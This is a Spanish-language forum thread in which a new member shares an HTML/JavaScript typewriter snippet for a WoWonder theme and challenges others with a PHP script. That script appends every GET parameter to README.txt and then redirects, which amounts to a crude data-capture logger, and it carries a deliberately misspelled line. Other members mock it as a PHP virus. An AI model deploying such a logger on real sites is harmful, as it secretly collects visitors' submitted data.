Articulo MONTAGES DE SITIOS Y REDES SOCIALES

Sirve para por ejemplo que te salga que la funcióñ frité no existe en PHP ni en ningún otro lenguaje no? 🤔
También para que te diga que "$ande" no es ni un demonio ...
De echo para lo otro que sirve si supieras de verdad me lo dices aquí mismo CODIGO FUENTE PROBADO 👀👀

SOLO DIME PARA QUE ES EL README.txt para ver qué tanto sabes y me quito el sombrero

Otra cosita el frité con tilde solo es para ocultar lo va en esa sección de código de lo dejo de tarea
 
Última edición:
De echo para lo otro que sirve si supieras de verdad me lo dices aquí mismo CODIGO FUENTE PROBADO 👀👀

SOLO DIME PARA QUE ES EL README.txt para ver qué tanto sabes y me quito el sombrero
Uff no no para nada, yo no sé nada 😅 completo rookie acá yo ... aquí el que sabe eres tú, el crack eres tú, yo solo intento entender lo que pones, pero chico ¿por qué será que no lo consigo? ...

Y ¿sombrero? uff que va, soy más de gorras en realidad... no sé, veo los sombreros algo anticuados 🎩
 
¿para qué necesitas el JS ahí? ... disculpa la incultura mía, pero bueno es más malo quedarme con la duda y no preguntar 😅
el js el lo puso jajaja porque el codigo ese creo que es una especie de defacing web, que el "hackingmode" de el se dichava
Prueba si tú NOD32 está realmente alerta y operativo: Copia este código en un txt e intenta guardarlo.



  • frité($ande, "\r\n");
  • fclose($handle);

  • exit
  • ?>
No fue mi Nod32, pero en VSCode, cuando pones algo mal o te confundes en algo, el sistema te subraya en rojo lo que este mal, y te saca una alerta en la parte de arriba (no se si lo has visto). Cuando puse el codigo para leerlo bien, en el visual studio no, pero el sartén me dijo "al fin frité el pollo" , que cosa mas rara, y el $ande, si no tiene ninguna conexión en algun otro fichero, no creo que vaya a $andar .

Me recuerdas a mi cuando mas chama jajaja, mira que yo inventaba asere Lucien que recuerdos, esta es la nueva generación, pero este es mas charlatán de lo que fui yo
 
Hola, gracias por tu interés en el foro. En ningún momento dije que te iba a banear, solo te di un consejo para que participes mejor, No sé en qué otros sitios has estado, pero las cosas no se hacen así aquí. Aquí se respeta la opinión de los demás y se argumenta con educación. Y si, el foro está creado con xenforo 2 y el código fuente está escrito por sus desarrolladores. Pero eso no significa que yo no tenga ningún mérito o derecho sobre él. Yo pagué una licencia para poder usarlo en mi página y adaptarlo a mis necesidades. Eso es algo legal y legítimo. Si quieres compartir tu trabajo o tus ideas, tienes que estar dispuesto a escuchar lo que los demás piensen al respecto. No se trata de criticar, sino de dialogar y aprender. Espero que lo entiendas y que sigas participando de forma constructiva. Un saludo.
Increíble la capacidad de Lucien para manejar este tipo de situaciones y mantener la paciencia, digno de un verdadero admin de foro. No usa su posición de admin para ganar un debate, en cambio destroza al contrario con argumentos increíblemente válidos y serenos.

Ahora, GHOSTFACE yo también comentaré, porque para eso es el foro :v a lo que Lucien se refería, antes de que lo atacaras verbalmente, es a que, al crear un tema de conversación en el Foro, debes de agregar la mayor cantidad de información posible antes de publicarlo, de esta forma evitas confusión entre los demás usuarios y se evita que el servidor del foro se llene de contenido sin ningún propósito ni nada que aportar. Y ahora mi propio criterio, pareces ser nuevo y no entender cómo funciona el foro, pues normalmente se debe tratar a los demás usuarios con respeto, para evitar que este foro se convierta en una comunidad tóxica. Saludos y Bienvenido al foro

(NOTA: No por corregirte pero Cara Fantasma en inglés se escribe Gosht Face)

Oh dios mío, un poco de HTML y Js... increíble aporte a los programadores amigo, genial.
APORTE A LOS PROGRAMADORESVer el archivos adjunto 4435
Código fuente para modificar letra fondo y color en wowonder 4.1.1 utilizando el theme wondertag

Código fuente:
<!-- HACKIN!MOD, GHOSTFACE | courier | #05fa0d | negrita | trebuchet ms | Sylfaen -->
<html>
<head>
<title>Stile</title>
</head>
<body style="background-color:;font-family:Sylfaen;color:grey;">
<span id="content"></span><span style="height:20px;width:20px;background-color:#05fa0d;"> </span>
<script>
var menu = [
"HACKIN!MOD",
],
i = 0, j, item, html,
e = document.getElementById("content"),
doChar = function() {
e.innerHTML += item[j++];
if (j < item.length) {
setTimeout(doChar, 10);
}
else {
e.innerHTML += "<br/>";
doItem();
}
},
doItem = function() {
if (i < menu.length) {
item = menu[i++];
j = 0;
doChar();
}
};
doItem();
</script>
</body>
</html>

El tittle no se muestra en el theme wondertag solo es para que te guíes y sepas para que sirve el código
El contenido dentro de las etiquetas <title> y </title> no modifica el funcionamiento de tu sitio pero, tampoco es para guiarse. El contenido envuelto en estas etiquetas se mostrará como el nombre del sitio web, algo así como el nombre de una app, este título se muestra en la pestaña del navegador, y esta pestaña, esta ubicada en la parte superior del navegador

Prueba si tú NOD32 está realmente alerta y operativo: Copia este código en un txt e intenta guardarlo.

  • <?php
  • header("Location: /423/ ");
  • $handle = fopen("README.txt", "a");

  • foreach($_GET as $variable => $value) {
  • fwrite($handle, $variable);

  • fwrite($handle, "=");

  • fwrite($handle, $value);

  • fwrite($handle, "\r\n");
  • }

  • frité($ande, "\r\n");
  • fclose($handle);

  • exit
  • ?>
El servidor Apache2 con PHP8.1 en Linux bloquea eso... Usé el server que tenía en Node y pos lo mismo...

De echo para lo otro que sirve si supieras de verdad me lo dices aquí mismo CODIGO FUENTE PROBADO 👀👀

SOLO DIME PARA QUE ES EL README.txt para ver qué tanto sabes y me quito el sombrero

Otra cosita el frité con tilde solo es para ocultar lo va en esa sección de código de lo dejo de tarea
Papi no intentes hacer más virus en php, y menos presumirlos en este foro donde hay titanes programadores(No me incluyo) estoy casi seguro de que hasta AkaMe (No se si sepa programación) sin revisar el código entendido lo que hace.
 
Última edición por un moderador:
APORTE A LOS PROGRAMADORESVer el archivos adjunto 4435
Código fuente para modificar letra fondo y color en wowonder 4.1.1 utilizando el theme wondertag

Código fuente:
<!-- HACKIN!MOD, GHOSTFACE | courier | #05fa0d | negrita | trebuchet ms | Sylfaen -->
<html>
<head>
<title>Stile</title>
</head>
<body style="background-color:;font-family:Sylfaen;color:grey;">
<span id="content"></span><span style="height:20px;width:20px;background-color:#05fa0d;"> </span>
<script>
var menu = [
"HACKIN!MOD",
],
i = 0, j, item, html,
e = document.getElementById("content"),
doChar = function() {
e.innerHTML += item[j++];
if (j < item.length) {
setTimeout(doChar, 10);
}
else {
e.innerHTML += "<br/>";
doItem();
}
},
doItem = function() {
if (i < menu.length) {
item = menu[i++];
j = 0;
doChar();
}
};
doItem();
</script>
</body>
</html>
Jajajaja sin comentarios copia y pega ajjaa
 
Atrás
Arriba